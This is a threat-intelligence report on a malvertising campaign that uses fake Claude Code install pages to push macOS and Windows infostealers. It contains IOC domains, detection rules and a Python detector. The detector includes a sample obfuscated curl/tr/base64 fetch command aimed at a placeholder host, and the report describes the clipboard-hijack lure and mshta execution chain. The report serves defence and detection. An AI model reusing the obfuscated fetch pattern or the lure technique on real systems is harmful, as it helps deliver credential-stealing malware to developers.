Malvertising & SEO Poisoning Exploit Claude Code Interest to Deliver Infostealers
Threat actors are exploiting trusted advertising real estate on Google Search to capitalize on growing developer interest in Anthropic's Claude Code. Sponsored ads and SEO-poisoned organic results redirect users to convincing fake installation pages hosted on legitimate platforms such as GitLab Pages and Bitbucket Pages, lending additional credibility to the lure. The fake documentation pages embed an InstallFix payload — a social engineering technique that tricks users into copying and executing a malicious terminal command disguised as a standard install step. Sandbox analysis of the claude-code-app[.]gitlab[.]io lure confirms clipboard hijacking behavior and an obfuscated curl command that decodes via tr substitution to resolve a C2 domain (jpbassin[.]com). A parallel lure page at claude-desktop-app[.]bitbucket[.]io was disclosed by community researcher @brkalbyrk7 as part of the same campaign. The abuse of Google's ad platform as the initial trust vector makes this particularly effective against technically sophisticated targets who expect sponsored results to be vetted.
The clipboard payload contains an obfuscated curl/base64 one-liner. Character substitution via tr decodes at runtime to reveal a C2 URL. The payload downloads and executes a platform-specific infostealer: AMOS on macOS via osascript and AppleScript, and Amatera on Windows via a PowerShell-to-mshta.exe HTA execution chain. Stolen data — including browser credentials, session cookies, Keychain contents, and cryptocurrency wallets — is exfiltrated to C2 infrastructure via HTTP POST with retry logic. The campaign demonstrates a convergence of malvertising, ClickFix-style social engineering, and multi-platform infostealer delivery, targeting the developer population specifically through tool installation workflows.
IOCs (5)
Domains (5):
- claude-code-app.gitlab.io
- claude-desktop-app.bitbucket.io
- jpbassin.com
- a2abotnet.com
- claude-code.official-version.com
Detections
- Mshta.exe Spawned by Script or Command Interpreter
- Detect browser redirects from ad networks to exploit kits or malware delivery pages
- Track user clicks on URLs that redirect through multiple domains before payload delivery
- Flag mshta.exe executing content from remote URLs or with obfuscated arguments
- Alert on processes accessing browser credential stores, cookies, or session databases
- Detect SEO-poisoned results by monitoring for sponsored ad clicks leading to newly registered or typosquatted domains
- Flag suspicious PowerShell execution — encoded commands, download cradles, or AMSI bypass
- Detect extraction of web session cookies from browser processes or profile directories
- Detect AppleScript execution spawned by non-standard parent processes
- Detect file downloads via certutil, bitsadmin, curl, or PowerShell from external URLs
- Detect clipboard-to-terminal paste operations containing encoded or obfuscated commands
- Alert on command-line arguments using character substitution, escape sequences, or encoding
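As an added example (not code from the report or from any vendor's detection content), the following Python replays the tr substitution and base64 decode stage found in a captured process command line, the pattern behind the obfuscated curl one-liner described above and behind the last two detections in this list. The sample command lines and the decoded URL are constructed placeholders, not indicators from the campaign.

```python
import base64
import re

# Constructed sample process-creation command lines (not from the report); the decoded URL is a placeholder.
SAMPLE_CMDLINES = [
    # decode stage of the kind described above: rot13-shuffled base64 that tr restores before base64 -d
    "curl -s \"$(echo 'nUE0pUZ6Yl9wZv5yrTSgpTkyYzyhqzSfnJDi' | tr 'A-Za-z' 'N-ZA-Mn-za-m' | base64 -d)\"",
    # benign tr use with no base64 stage
    "cat /etc/hosts | tr '\\t' ' '",
]

# echo '<blob>' | tr '<set1>' '<set2>' | base64 -d|--decode, with single or double quotes
TR_PIPELINE = re.compile(
    r"echo\s+['\"]?(?P<blob>[A-Za-z0-9+/=]+)['\"]?\s*\|\s*"
    r"tr\s+['\"](?P<set1>[^'\"]+)['\"]\s+['\"](?P<set2>[^'\"]+)['\"]\s*\|\s*"
    r"base64\s+(?:-d|--decode)"
)
URL_RE = re.compile(r"https?://[^\s'\"|;&)]+")

def expand_tr_set(spec: str) -> str:
    """Expand tr-style ranges such as 'A-Za-z' into the literal character list."""
    out, i = [], 0
    while i < len(spec):
        if i + 2 < len(spec) and spec[i + 1] == "-":
            out.extend(chr(c) for c in range(ord(spec[i]), ord(spec[i + 2]) + 1))
            i += 3
        else:
            out.append(spec[i])
            i += 1
    return "".join(out)

def decode_tr_pipeline(cmdline: str):
    """Replay the tr substitution and base64 decode; return decoded text and URLs, or None if absent."""
    m = TR_PIPELINE.search(cmdline)
    if m is None:
        return None
    set1, set2 = expand_tr_set(m["set1"]), expand_tr_set(m["set2"])
    # GNU tr pads a shorter SET2 by repeating its last character and ignores surplus characters
    set2 = (set2 + set2[-1] * len(set1))[: len(set1)]
    restored = m["blob"].translate(str.maketrans(set1, set2))
    try:
        decoded = base64.b64decode(restored + "=" * (-len(restored) % 4)).decode("utf-8", "replace")
    except ValueError:
        decoded = ""
    return {"decoded": decoded, "urls": URL_RE.findall(decoded)}

def triage(cmdline: str) -> dict:  # alert when the decode stage yields a URL
    result = decode_tr_pipeline(cmdline) or {"urls": []}
    return {"alert": bool(result["urls"]), "urls": result["urls"]}
```

Feed it the command-line field of process-creation events (auditd, EDR, or Sysmon-style telemetry); a hit should be correlated with the parent shell being spawned from a terminal paste or from curl/PowerShell download activity before it is treated as confirmed.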